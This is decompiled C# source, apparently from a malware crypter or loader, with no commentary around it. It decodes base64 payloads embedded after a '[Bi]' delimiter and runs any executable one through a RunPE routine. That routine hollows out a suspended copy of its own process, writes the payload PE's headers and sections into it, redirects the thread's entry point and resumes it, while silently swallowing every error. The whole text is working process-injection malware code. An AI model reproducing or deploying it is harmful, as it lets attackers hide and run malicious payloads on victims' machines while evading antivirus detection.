public static void J() { try { string[] strArray1 = Strings.Split(uUrKUuSBRRmTiQczhlKTWtHSbRblp.Arq, "[Bi]", -1, CompareMethod.Binary); string[] strArray2 = uUrKUuSBRRmTiQczhlKTWtHSbRblp.Exte.Split(','); int length = strArray1.Length; int index = 1; while (index <= length) { if (Operators.CompareString(strArray2[checked (index - 1)], ".exe", false) == 0 & uUrKUuSBRRmTiQczhlKTWtHSbRblp.PE) { uUrKUuSBRRmTiQczhlKTWtHSbRblp.Bte = Convert.FromBase64String(strArray1[index]); RunPE.Run(uUrKUuSBRRmTiQczhlKTWtHSbRblp.Bte, (string)null, (string)null, true); } else { uUrKUuSBRRmTiQczhlKTWtHSbRblp.e(strArray2[checked (index - 1)], strArray1[index]); } checked { ++index; } } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } }
public static bool Run(byte[] data, string cmd = null, string path = null, bool compatible = true) { path = Application.ExecutablePath; int num = 1; bool flag; while (!RunPE.HandleRun(path, cmd, data, compatible)) { checked { ++num; } if (num > 5) { flag = false; goto label_5; } } flag = true; label_5: return(flag); }
private static bool HandleRun(string path, string cmd, byte[] data, bool compatible) { string commandLine = string.Format("\"{0}\"", (object)path); RunPE.STARTUP_INFORMATION startupInfo = new RunPE.STARTUP_INFORMATION(); RunPE.PROCESS_INFORMATION processInformation = new RunPE.PROCESS_INFORMATION(); startupInfo.Size = checked ((uint)Marshal.SizeOf(typeof(RunPE.STARTUP_INFORMATION))); bool flag1; try { if (!string.IsNullOrEmpty(cmd)) { commandLine = commandLine + " " + cmd; } if (!RunPE.CreateProcess(path, commandLine, IntPtr.Zero, IntPtr.Zero, false, 4U, IntPtr.Zero, (string)null, ref startupInfo, ref processInformation)) { throw new Exception(); } int int32_1 = BitConverter.ToInt32(data, 60); int int32_2 = BitConverter.ToInt32(data, checked (int32_1 + 52)); int[] context = new int[179]; context[0] = 65538; if (IntPtr.Size == 4) { if (!RunPE.GetThreadContext(processInformation.ThreadHandle, context)) { throw new Exception(); } } else if (!RunPE.Wow64GetThreadContext(processInformation.ThreadHandle, context)) { throw new Exception(); } int num1 = context[41]; int buffer1; int num2; if (!RunPE.ReadProcessMemory(processInformation.ProcessHandle, checked (num1 + 8), ref buffer1, 4, ref num2)) { throw new Exception(); } if (int32_2 == buffer1 && RunPE.NtUnmapViewOfSection(processInformation.ProcessHandle, buffer1) != 0) { throw new Exception(); } int int32_3 = BitConverter.ToInt32(data, checked (int32_1 + 80)); int int32_4 = BitConverter.ToInt32(data, checked (int32_1 + 84)); int baseAddress = RunPE.VirtualAllocEx(processInformation.ProcessHandle, int32_2, int32_3, 12288, 64); bool flag2; if (!compatible && baseAddress == 0) { flag2 = true; baseAddress = RunPE.VirtualAllocEx(processInformation.ProcessHandle, 0, int32_3, 12288, 64); } if (baseAddress == 0) { throw new Exception(); } if (!RunPE.WriteProcessMemory(processInformation.ProcessHandle, baseAddress, data, int32_4, ref num2)) { throw new Exception(); } int num3 = checked (int32_1 + 248); int num4 = checked ((int)BitConverter.ToInt16(data, int32_1 + 6) - 1); int num5 = 0; while (num5 <= num4) { int int32_5 = BitConverter.ToInt32(data, checked (num3 + 12)); int int32_6 = BitConverter.ToInt32(data, checked (num3 + 16)); int int32_7 = BitConverter.ToInt32(data, checked (num3 + 20)); if (int32_6 != 0) { byte[] buffer2 = new byte[checked (int32_6 - 1 + 1)]; Buffer.BlockCopy((Array)data, int32_7, (Array)buffer2, 0, buffer2.Length); if (!RunPE.WriteProcessMemory(processInformation.ProcessHandle, checked (baseAddress + int32_5), buffer2, buffer2.Length, ref num2)) { throw new Exception(); } } checked { num3 += 40; } checked { ++num5; } } byte[] bytes = BitConverter.GetBytes(baseAddress); if (!RunPE.WriteProcessMemory(processInformation.ProcessHandle, checked (num1 + 8), bytes, 4, ref num2)) { throw new Exception(); } int int32_8 = BitConverter.ToInt32(data, checked (int32_1 + 40)); if (flag2) { baseAddress = int32_2; } context[44] = checked (baseAddress + int32_8); if (IntPtr.Size == 4) { if (!RunPE.SetThreadContext(processInformation.ThreadHandle, context)) { throw new Exception(); } } else if (!RunPE.Wow64SetThreadContext(processInformation.ThreadHandle, context)) { throw new Exception(); } if (RunPE.ResumeThread(processInformation.ThreadHandle) == -1) { throw new Exception(); } } catch (Exception ex) { ProjectData.SetProjectError(ex); Process processById = Process.GetProcessById(checked ((int)processInformation.ProcessId)); if (processById != null) { processById.Kill(); } flag1 = false; ProjectData.ClearProjectError(); goto label_41; } flag1 = true; label_41: return(flag1); }